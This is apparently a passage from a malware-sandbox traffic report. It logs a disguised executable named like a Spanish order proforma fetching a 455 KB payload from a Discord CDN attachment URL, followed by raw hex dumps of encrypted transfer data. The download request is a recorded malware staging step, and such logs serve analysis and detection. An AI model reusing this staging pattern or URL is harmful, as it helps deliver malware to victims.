11 54 b1 c4 d8 a7 9a e4 6f c8 c1 22 50 c0 Data Ascii: R07Ffy/qrBOF%^F^Y<%Od8o_!jCDb~ptY^zl#W~J,aKb1w*RW-rT2<4-`;7u2RF [e~}v&k1x96~FOa+1m$\|[To"P
2021-11-25 15:51:20 UTC	48	IN	Data Raw: f2 3b ac e9 15 db db 4f 87 94 81 62 c0 0b cb 08 a6 cb 63 99 6c dd 79 e1 2a 94 ed 1b ff 1e e0 68 db 5d 8c 70 a7 9d b6 c4 11 2d d1 b8 e0 f1 3a 33 62 fb 27 68 24 f6 e2 12 b2 85 65 3c 22 65 88 c3 d6 4d b7 04 07 32 82 32 3d e8 48 f7 4d 2f 36 36 38 38 0b e6 5e 1b 06 92 62 80 79 dd 57 09 d6 e1 f6 1b cb 06 40 c8 87 0c 5e 91 79 29 a4 34 fe 7b 3c 25 e6 75 61 f8 f8 3c 12 6c 82 36 51 22 63 37 51 c0 da 0a a7 1a 90 e5 26 1f c9 08 a7 29 10 06 fd 07 06 b5 8f 66 b9 c3 1d 06 48 8c e7 28 9c 4e 66 33 bd d6 9f 15 f1 d0 bd 66 28 13 79 dc f1 e4 cb ee 86 07 0c aa db 49 fd 85 66 cb 2c 79 e8 4a 23 82 fe e6 24 c4 9f 38 d3 75 52 e3 2f 10 1d 50 f3 41 66 17 55 26 83 92 1a 7c ad 31 b4 eb fb 80 48 f4 92 f2 30 89 f8 10 f1 76 92 24 69 f6 17 8e 42 ee 0a 1a 63 82 90 50 03 7d fe 3a 0e 56 74 Data Ascii: ;Obcly*h]p-:3b'h$e<"eM22=HM/6688^byW@^y)4{<%ua<l6Q"c7Q&)fH(Nf3f(yIf,yJ#$8uR/PAfU&\|1H0v$iBcP}:Vt
2021-11-25 15:51:20 UTC	49	IN	Data Raw: fc ec 54 01 09 2c 22 68 2f 0f 80 8e 4b 70 ab f9 1c 48 cd 0e a7 4f 42 d7 27 eb 7e ac 26 61 80 c2 cc 68 be db e4 b6 75 d3 bb e8 32 e6 29 e4 44 3d b9 a0 84 40 c0 12 5c ad 6d 08 0f ea ff d0 22 3a 3e 19 2e 6f 1e 9f 59 86 7c 4a f2 67 85 66 cb 5b 50 c0 d7 94 89 d2 80 4a 2a 6f 53 75 d7 27 67 e7 2a 19 4c 47 0c 42 ec 45 54 09 34 9d 12 5a 19 24 56 e1 c0 ea ef 07 ba f2 ea f8 45 73 1f c9 31 7e 5f 12 be 8a c2 49 b4 1d fa 1f fb 82 ee 30 1a 15 c4 a2 d3 42 42 e8 4a f4 2c 0f 43 a2 cb 38 3c 23 e1 58 67 49 2f c2 90 20 9d de 29 01 1d fc 3d ae c0 65 e4 10 d7 34 ef 0b f9 a6 15 c5 9a 83 a6 63 34 36 3a c8 92 22 f1 82 40 21 d1 39 3d 47 04 34 1d 88 28 ae cb 75 5d 04 22 98 5c 80 ce 54 b3 cf c1 ba cb e3 a4 02 8b d1 3f 9b 1b 50 0d 39 ce 8b d1 0a a7 11 5c 09 a2 79 bf f7 92 2e e6 e1 c1 Data Ascii: T,"h/KpHOB'~&ahu2)D=@\m":>.oY\|Jgf[PJoSu'gLGBET4Z$VEs1~_I0BBJ,C8<#XgI/ )=e4c46:"@!9=G4(u]"\T?P9\y.
2021-11-25 15:51:20 UTC	50	IN	Data Raw: 13 20 6f 2e f3 ed fb 88 61 0d 2a f3 b3 7b cf 09 db e4 7f 6a b4 16 05 0c 47 b5 d6 97 c5 26 8c 9d 86 93 78 6b cd 33 84 c4 2c e5 f8 de a0 67 d8 a6 1c db 15 23 11 b2 00 b8 f7 ad 31 09 da d4 e5 11 d1 01 89 03 c3 b8 f0 f7 d2 94 50 f3 e1 3e c2 89 26 56 d2 40 4b 7e 4d 2f 4f 3e 92 e0 de bd 5d 94 61 36 34 02 87 72 15 3c b3 d2 4c 93 06 aa c4 9f ba f8 12 f8 21 66 32 e1 f7 d2 6e aa e6 4e 04 db da 36 5f 2c 29 95 b0 44 7e ac 51 fe ec 37 23 fa fe 37 86 d2 22 8a 96 41 80 75 db 2e 3c ea 9a 9a 3b 2e e8 9d 35 4e fc 3c c2 76 6a 3c d1 db 6c 8a f0 3d 26 2d 9e 08 4b 30 6e 67 0a 93 7b 3b ac ec 26 f4 fa ee 21 37 8f 9a 84 9b 3e d6 93 07 76 9a 58 e8 74 45 a9 35 66 8a 5d 11 30 05 da c9 8f 5f 70 1f 00 77 3b 9a 8d 8f a5 aa da 9a 82 cd f0 f6 8a 90 4e 6b 2f e1 86 88 7f 3f 30 a7 a7 cf 4a Data Ascii: o.a*{jG&xk3,g#1P>&V@K~M/O>]a64r<L!f2nN6_,)D~Q7#7"Au.<;.5N<vj<l=&-K0ng{;&!7>vXtE5f]0_pw;Nk/?0J
2021-11-25 15:51:20 UTC	52	IN	Data Raw: 8e 1f f3 de 5e 8b 00 8a 50 f1 db d7 91 68 4d 7a 11 fd c8 b1 70 1e 78 af cb 37 39 4b ae 52 03 35 b7 f0 2f a3 ea 7a 5d b6 c7 e1 24 5f 8c 83 82 d8 11 2b 91 ac 53 38 cc d7 21 ec d2 88 9f a6 2d 02 4f 6f 7b 1d c4 99 d7 16 77 da 9f 56 fb 50 63 87 75 23 a6 ab 30 bd 62 19 91 a3 a7 97 8e fc 11 e8 e7 4c 42 30 4a 43 46 87 2f e6 c0 12 09 bb 9f 1d fa e3 a4 0e 64 b6 f9 92 b3 7c a2 c9 34 90 8b af 0d 50 fe 3e d7 4d 4e 79 44 c0 0b ab 61 f2 aa e7 2d 68 8f 5a ea 7f fb 87 49 4f a3 9d ba c7 2d 36 bd 8a 0b 89 68 54 01 95 05 b7 f2 f3 ab a5 9e 32 3d 59 06 b4 79 44 c0 28 19 fa 2b e9 54 c2 55 58 db e9 f3 56 7c b5 1d 4f 7a b5 97 08 32 96 8f 0f 96 3b c5 1a 4a 3f b5 4f e6 c1 0c d0 21 2b 38 52 09 e3 d0 47 d2 b2 5d c8 af c7 90 f3 ae 2b 7c 4c 2b 37 34 39 88 59 67 bc 78 bc 0c 97 72 46 bb Data Ascii: ^PhMzpx79KR5/z]$_+S8!-Oo{wVPcu#0bLB0JCF/d\|4P>MNyDa-hZIO-6hT2=YyD(+TUXV\|Oz2;J?O!+8RG]+\|L+749YgxrF
2021-11-25 15:51:20 UTC	53	IN	Data Raw: 13 4e 1b ac 47 ba 4e c8 77 31 c2 ab 58 ec 85 90 d3 bb 6c b8 cc 2e d9 b7 db 65 ac e5 c2 19 d8 53 a3 35 be ed ff 8d e2 7b 81 ad 04 8d d8 59 35 51 1e 72 45 62 2e 81 4a 4e 79 56 aa 60 5a e3 f0 d1 e3 c3 1b cb 92 86 2d 0e 8c 64 86 ff 0a fb c2 c1 14 5e 70 b7 fe 82 e3 40 48 aa e3 04 8e e0 d6 99 26 e7 3a 77 4e 15 6a 8b 74 b4 14 38 0d 2d a8 df e1 cf 07 6f 70 ff 82 72 4d 58 e1 29 73 74 97 81 fc f0 0f 6f 10 c5 45 a4 80 43 6c 23 af 93 e6 7c 4f 8e 0e 69 8b dc 96 08 94 85 b6 4d 1c 49 4b b3 2b a8 21 03 09 19 c4 ac 5f 94 1b b6 9c 0a f0 22 03 b9 80 1e e0 a0 b0 c6 69 d9 67 36 05 35 2b a7 ae 57 52 fa 99 54 e7 22 89 d2 6e 99 7c 51 df f1 61 01 40 14 0d 18 a1 da 72 ac d0 8e 16 b0 7c 87 c9 de 38 d0 43 5d a1 cf b2 fa ab 68 90 17 c2 14 b7 8b d8 4d b8 c4 7e 99 d4 da e9 fd bf 85 04 Data Ascii: NGNw1Xl.eS5{Y5QrEb.JNyV`Z-d^p@H&:wNjt8-oprMX)stoECl#\|OiMIK+!_"ig65+WRT"n\|Qa@r\|8C]hM~
2021-11-25 15:51:20 UTC	54	IN	Data Raw: 2f 1f bc ff ba ca be 0c cc 5a 01 66 62 6b 3a 9e a4 c7 77 77 d9 b5 e8 3d 7a 45 69 0c 48 a7 a5 c1 21 e0 6f 2f 12 bf 24 e3 af af 2c a0 03 df 6e 9a 35 08 a3 2d 1f a9 cf 23 e2 4b b3 50 c1 db b2 4f 99 d8 20 12 95 73 e6 13 4e 1b ac 20 3b ab bf 85 63 9b 38 b3 53 97 83 f8 2f 8e 12 4c 07 04 b8 ce 47 5e 9b 15 f7 70 a5 a4 85 cf d1 ce 2a fc 03 7b c4 78 b6 7e bb 66 71 40 1f fa 15 c2 68 36 0d c3 1c 4a 7a 60 74 f9 75 74 a9 bc 7d c1 b2 f3 5e a1 a8 d3 32 88 91 64 83 61 b5 74 1b 7b c6 9c 32 99 17 9b e6 2d a6 1f 16 54 6e 5f 75 66 b6 77 52 22 00 07 cf 70 23 8c 84 e6 c5 e8 97 ba 6e 1e 79 63 02 42 26 68 3a db e2 f9 a4 97 b7 c7 25 72 2f 14 df 8a 6b 4a f4 10 a8 c0 2b 55 3e c3 02 83 d3 54 71 af d0 5e fe fe 51 e3 d3 ea be 7b ba b5 f1 c7 b0 e3 cb 7e ef ca 55 ba 72 56 b7 ef 71 ac 22 Data Ascii: /Zfbk:ww=zEiH!o/$,n5-#KPO sN ;c8S/LG^p*{x~fq@h6Jz`tut}^2dat{2-Tn_ufwR"p#nycB&h:%r/kJ+U>Tq^Q{~UrVq"
2021-11-25 15:51:20 UTC	58	IN	Data Raw: ce 4a 34 f5 9c cd 3d 52 91 28 d7 c2 ff da a2 53 71 c0 ee cb a4 de 94 c0 43 da c2 6c 5d 8a 5f 29 96 37 b7 46 36 8d d3 d2 b0 7a 65 67 de 54 fc 32 ec 6d d5 a7 97 8e 8b 63 c9 6d b3 bf 26 e3 de bc d8 36 a3 25 b3 6d ce 87 cc 7a 4f 7f 37 16 46 dc eb b8 07 9f 25 ef 58 ba 1e cd 98 09 9e 6e 54 4c 4a fe ae 85 1c d2 23 ed 46 c9 e6 eb 24 61 a0 5a 09 96 d9 16 fe 1c 85 55 ac ee ce a7 41 e1 1e 49 eb 96 ec c9 ca 8a dc 29 27 3a d4 4f 61 a2 1b 75 b3 b8 99 8b a8 70 c6 91 9c d3 b0 a8 7c 72 34 40 f4 72 99 b4 19 29 80 de c6 d4 38 5f 2b 99 61 1b 73 c5 e8 73 ce d4 a3 46 60 af 76 6d 83 1a cf 79 37 39 88 11 32 fb b4 66 36 0c 14 6f aa 40 72 7d 5b 1a 76 a8 cd 89 2b d5 c2 80 7d e8 6b af ab aa 3e a5 2a e6 5f e7 92 8c 0b cb 39 99 e7 33 f7 ec d3 e3 57 ef 03 7d 30 49 92 90 86 e3 36 8f a8 Data Ascii: J4=R(SqCl]_)7F6zegT2mcm&6%mzO7F%XnTLJ#F$aZUAI)':Oaup\|r4@r)8_+assF`vmy792f6o@r}[v+}k>*_93W}0I6
2021-11-25 15:51:20 UTC	62	IN	Data Raw: ec 9b 49 11 3e cf 0e ac 39 cc 7f 3e 2b 2a f6 fc 05 d3 d2 e1 fb 8d d6 63 6c 34 6e 4b 0d 25 e1 ce 83 ef 0c e6 4b 45 59 6d 87 10 b7 3e c1 e6 4c dd 41 5e 66 99 86 d0 f1 72 a2 c6 69 a1 24 eb 7f 86 69 36 39 85 15 27 dd 2a 68 b6 fb 8a 5f 86 f1 b3 6b 26 60 ac 39 54 c6 ed fe 04 4e e3 5d 8d 70 f6 e3 e1 f8 13 20 96 38 04 bf 5f fe 98 cf de 45 6a 20 3d 1e 14 65 3c d0 4d 41 5e aa d6 01 0f 24 96 47 cc 00 c3 59 1d fb b4 19 e1 ca bf 51 77 4d 1f 76 7d ce b0 f0 0c 57 8d da 9d b7 71 c2 60 ae c7 19 f6 93 c1 f4 6d 06 8e f4 e1 fc 07 32 3b 32 86 f2 35 2b fd b3 40 c6 f1 3c d5 33 32 07 83 f4 92 51 99 d3 08 a3 47 45 63 82 fc 99 63 59 e9 91 05 05 ac 0c 95 e0 49 c8 36 33 ec 21 c7 17 94 9c d2 f1 0f 99 ab 51 76 6e 3c bd f7 24 63 02 b3 4a 2a ee d3 3a 3b a1 10 59 e4 5c 7e 46 e6 7b f2 53 Data Ascii: I>9>+cl4nK%KEYm>LA^fri$i69'h_k&`9TN]p 8_Ej =e<MA^$GYQwMv}Wq`m2;25+@<32QGEccYI63!Qvn<$cJ*:;Y\~F{S
2021-11-25 15:51:20 UTC	63	IN	Data Raw: fe 66 12 fa e6 ac 95 33 7e 6b 38 35 bb 54 b7 f9 e8 73 2b 5a 8f 22 50 f3 d7 11 42 2e 20 7b f7 97 88 ef 4a 22 95 83 f0 62 b6 bc 14 60 90 15 1b e1 62 b3 7e 70 ac 57 8b 0e b6 fe 3c 21 63 bb 8a 8d 13 e6 47 6e ef 23 c5 29 ac 37 04 bd d3 30 b3 cb e1 58 8a ea fa 41 e9 82 46 d0 05 30 bd ef 16 ad 17 5c 02 f3 69 40 24 52 15 d0 4c 7e 71 92 91 75 26 6a 8b da 99 1b 76 05 d6 df d4 a1 05 36 91 0a 41 7a 6b 3d aa e3 44 58 b6 35 8d dc 61 fc e3 2f 88 61 0a 3e 75 29 ee 65 0b 1e 16 cc 61 f4 e7 f2 58 df 4c 8f 2c 32 0b 1b 17 77 ef 46 dd 5c 70 d9 dd dc 60 91 13 82 51 55 6d 0a 5a 09 ce ba ff 81 68 ec eb 83 f1 e9 95 0a 9e 3e 18 a1 c8 52 55 b3 6a 53 cd 08 ae c0 51 d4 09 ee 47 5a df da a3 1e ef 02 40 d2 86 4e c5 8d ac e9 8b e8 75 3c 69 db c3 2d 27 01 2f 66 74 9c 37 80 ed cd f2 8a 5f Data Ascii: f3~k85Ts+Z"PB. {J"b`b~pW<!cGn#)70XAF0\i@$RL~qu&jv6Azk=DX5a/a>u)eaXL,2wF\p`QUmZh>RUjSQGZ@Nu<i-'/ft7_
2021-11-25 15:51:20 UTC	68	IN	Data Raw: 8b 75 72 a4 bc 7f 96 a2 0d 17 cf 86 7b 40 b3 05 bd 59 6d 38 d3 d8 a5 37 07 04 17 f4 82 ef b2 00 88 6e a1 5d 01 9c be a3 90 65 0a ab 8c f3 61 9c 73 fc 7e 7c 7b 2c a3 95 6f 36 c6 04 00 81 42 d3 b1 cd 5f 2f b7 74 98 fa ff 02 59 ff 0c 4e 1f 25 74 2c 86 ef 6a 38 67 ae ca b3 41 bb 0d f6 8e 82 e3 5e 8e 1a f3 28 49 19 bb 2d 11 24 ef 03 7d 2e 4c fb bc de 6f bc 75 10 4f d9 5c 98 0a 97 1b 06 5b 22 6c 8f 92 9b 1c 94 e9 fa 1a 79 ee 3c bd 44 ee 69 d1 cc b4 02 18 71 ca 27 d1 da c9 3f 55 6c 3a 3d 5f e4 43 6d 0c 1e 4a 70 97 6f 43 6c b1 4c ff 05 bf 35 50 d8 99 87 0b 44 d3 9f 5e b7 47 55 68 b8 ce 1b 60 2f 82 c2 a2 df 3e 20 70 92 28 94 91 dc f6 6f 23 ea 99 e3 f9 39 be 0e b3 40 2a 1a 7a e7 15 5b 56 53 05 0d 16 a1 c7 2b 7e 6b cc 80 45 57 62 0f 5c d6 7d e7 fe 0a 0a 90 b5 f6 fc Data Ascii: ur{@Ym87n]eas~\|{,o6B_/tYN%t,j8gA^(I-$}.LouO\["ly<Diq'?Ul:=_CmJpoClL5PD^GUh`/> p(o#9@*z[VS+~kEWb\}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49760	162.159.134.233	443	C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-25 15:51:21 UTC	72	OUT	GET /attachments/900622540588843013/912979191073476678/Lxtcsmegwxhfqoabkjaduxyckamobho HTTP/1.1 User-Agent: aswe Host: cdn.discordapp.com Cache-Control: no-cache
2021-11-25 15:51:21 UTC	72	IN	HTTP/1.1 200 OK Date: Thu, 25 Nov 2021 15:51:21 GMT Content-Type: application/octet-stream Content-Length: 455680 Connection: close CF-Ray: 6b3c09b4feaa4e20-FRA Accept-Ranges: bytes Age: 105676 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=Lxtcsmegwxhfqoabkjaduxyckamobho ETag: "8242fb2442748493aa1d31dda471d43a" Expires: Fri, 25 Nov 2022 15:51:21 GMT Last-Modified: Wed, 24 Nov 2021 08:13:21 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1637741601530592 x-goog-hash: crc32c=lwQmpg== x-goog-hash: md5=gkL7JEJ0hJOqHTHdpHHUOg== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 455680 X-GUploader-UploadID: ADPycdututbtUcRl5WSW_hry_FIQngXAEOTvsF_C9upp3XZeadVl41eP9j6KorcCz-oWIrYx9Hq0o2OS5hKBDlbxS2aeJWKHkw X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
2021-11-25 15:51:21 UTC	73	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 50 31 41 4f 66 5a 6a 56 6b 34 25 32 46 70 64 32 6f 54 78 71 6c 57 78 6d 51 4e 57 53 39 70 25 32 42 54 53 4e 39 54 33 52 4d 68 74 56 45 75 6a 52 62 72 35 54 6d 47 55 55 74 63 51 25 32 46 72 41 61 67 25 32 46 6f 41 58 62 36 50 4b 70 6d 61 30 31 48 6e 51 57 61 32 4e 37 6b 6d 43 6c 25 32 46 72 37 31 42 65 51 4b 25 32 42 4d 56 46 72 30 55 5a 37 32 56 66 25 32 42 4d 25 32 46 79 4c 52 53 56 47 77 45 72 36 72 5a 52 55 7a 6f 39 7a 53 4b 32 6c 61 46 43 67 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=P1AOfZjVk4%2Fpd2oTxqlWxmQNWS9p%2BTSN9T3RMhtVEujRbr5TmGUUtcQ%2FrAag%2FoAXb6PKpma01HnQWa2N7kmCl%2Fr71BeQK%2BMVFr0UZ72Vf%2BM%2FyLRSVGwEr6rZRUzo9zSK2laFCg%3D%3D"}],"group":"cf-nel",
2021-11-25 15:51:21 UTC	73	IN	Data Raw: 06 a2 3a 2a 02 a3 a5 a2 2b 8e 0f ca 93 89 f5 92 0c b5 6b 2d 8a 76 54 f7 9f ac c2 8a 73 39 ad 5e 8f 8d f7 83 e1 d1 38 31 80 5a f0 7f df cf 22 62 95 9c 2d 8a 73 3c 23 ed f6 02 ac c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 Data Ascii: :*+k-vTs9^81Z"b-s<#DrFi-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yD
2021-11-25 15:51:21 UTC	75	IN	Data Raw: dd d7 22 57 67 02 87 f2 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 Data Ascii: "Wgh7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/k
2021-11-25 15:51:21 UTC	76	IN	Data Raw: 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc Data Ascii: ,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWf
2021-11-25 15:51:21 UTC	77	IN	Data Raw: 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 Data Ascii: fTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/
2021-11-25 15:51:21 UTC	79	IN	Data Raw: 2d 6c d4 47 44 73 a9 b3 5a e2 aa 26 6c 59 8c 67 c6 af b5 f9 a2 e4 d4 a4 c3 93 5e 12 50 13 43 65 c8 08 94 e9 ec 4c 2c f9 99 6f c0 d8 39 49 fb d0 53 1b c9 4e 25 e3 f0 64 6d c7 55 82 8b b4 1f 60 da 5d 1d 05 dc 24 97 66 b1 bc 11 e1 22 0d 13 dd 24 56 0c 2d 93 7a a0 3c 86 64 70 3a 36 d9 b4 cc 6b 0a 30 d6 c7 b9 cc 58 b7 46 93 78 1f 5f 13 46 46 20 85 ab c4 d2 05 da 9d ba 02 ad 6b 56 e1 c0 e3 f0 be f5 60 65 84 2f 3b ad c5 b7 7f 47 1f 15 35 b2 c7 f5 8d dc be 7a 1e b9 e0 a2 c0 be 20 83 f1 1c fb d2 5d f0 66 4e 7a 67 d9 c8 b6 1c 91 ad d2 49 e1 93 c5 3d 9c 3c 1b 1f 73 6d d0 5f 5f f1 19 8e ff 1d 08 23 d9 c2 72 a0 c3 fe 3a c8 92 26 96 8c 69 ba 69 d1 77 53 17 f1 29 7d 41 ba 62 6a e9 03 dd 53 90 f8 22 8f df 0d b7 90 99 11 52 1a 4d ba 96 04 5c c3 23 d6 9d 31 76 96 ee d8 ef Data Ascii: -lGDsZ&lYg^PCeL,o9ISN%dmU`]$f"$V-z<dp:6k0XFx_FF kV`e/;G5z ]fNzgI=<sm__#r:&iiwS)}AbjS"RM\#1v
2021-11-25 15:51:21 UTC	80	IN	Data Raw: aa 8f fe f0 80 47 66 83 b0 53 fa 02 a5 55 9b b5 76 60 84 83 19 20 52 00 75 e9 c6 a8 df 91 c2 9e 23 00 15 f3 ef ee 20 05 4a 0b 4a 23 79 ac eb ca 2b dc 04 a0 57 88 fb 84 47 52 cc f1 95 04 d9 c0 65 3a 32 0c fa 62 a5 46 b3 b9 f7 ab 50 f5 fe 25 98 d4 b7 9f 04 c7 12 63 07 12 26 fb ec 85 5a e4 71 27 c8 3e 86 22 75 2d 29 90 12 6e 25 85 ed d6 8a 9d 08 9a 3d 93 f5 f0 74 0c b1 ad fa 2e 02 bf fa 19 cd 52 99 69 8c 1c 44 e4 6d 49 66 51 11 37 01 0a 96 08 04 68 6e 51 16 a8 2c 2b 95 84 e7 0d f8 bf 04 43 b3 71 21 e0 96 ce 66 2f 94 e8 98 7a 53 44 e2 7a 55 57 0a 5f e6 47 66 83 05 51 6e 5d 01 f0 84 73 29 a0 ba 3e f1 5f 34 f5 b0 fd b4 c5 2e 78 7f 4c d1 dd f6 24 65 07 f4 5f 51 65 69 d1 4e 80 7a 6d 35 ea 3a 31 e1 2f f7 92 2b 94 7e e4 e4 00 e3 29 e7 ff 87 f9 27 b8 b9 5a 81 04 c4 Data Ascii: GfSUv` Ru# JJ#y+WGRe:2bFP%c&Zq'>"u-)n%=t.RiDmIfQ7hnQ,+Cq!f/zSDzUW_GfQn]s)>_4.xL$e_QeiNzm5:1/+~)'Z
2021-11-25 15:51:21 UTC	81	IN	Data Raw: a5 3f c0 c1 ea c1 2d ac e9 78 65 06 2f 99 69 88 6e a2 2e ae 94 50 8c 0f 36 94 01 38 0a 74 e6 11 96 6c 54 41 53 4d 43 cc 5f c8 39 d2 57 c0 dc 58 ef 01 c9 d6 18 26 98 a5 94 09 24 fd b8 f8 86 6b d1 ca 86 71 11 87 16 bb 17 aa 2e f5 9a 36 3b 92 13 e7 ca 90 e9 1e 7e 4c ff 3f 7a 97 72 85 00 66 b1 7a 6b 6c 34 90 74 b5 97 6e af 41 5d 91 85 e0 73 4e 15 bc e5 fd b5 d5 64 d4 bd 0f 3c 5f 18 79 d1 69 43 22 9a 61 ec 55 50 f9 9a 23 55 c6 f0 09 d0 9f 85 f3 ed 8f 7b 35 7a 49 ac a3 a4 25 d3 48 bc cd c5 77 2e 20 75 eb f6 dd 89 a9 19 db 2e 77 d1 3c 17 21 48 71 58 c6 67 6f 1e 4a f3 25 ab 08 f5 88 84 11 d7 25 e7 34 14 70 4f 10 b0 dc 55 55 51 ea a4 ee cb 60 72 b2 c8 b2 c6 87 4f c3 45 34 e3 aa e5 c6 9b 42 38 c7 2f ec 88 76 6a bf 6b 8c 38 71 5a f9 74 b4 f1 e5 f3 bb 85 08 c1 7d 3f Data Ascii: ?-xe/in.P68tlTASMC_9WX&$kq.6;~L?zrfzkl4tnA]sNd<_yiC"aUP#U{5zI%Hw. u.w<!HqXgoJ%%4pOUUQ`rOE4B8/vjk8qZt}?
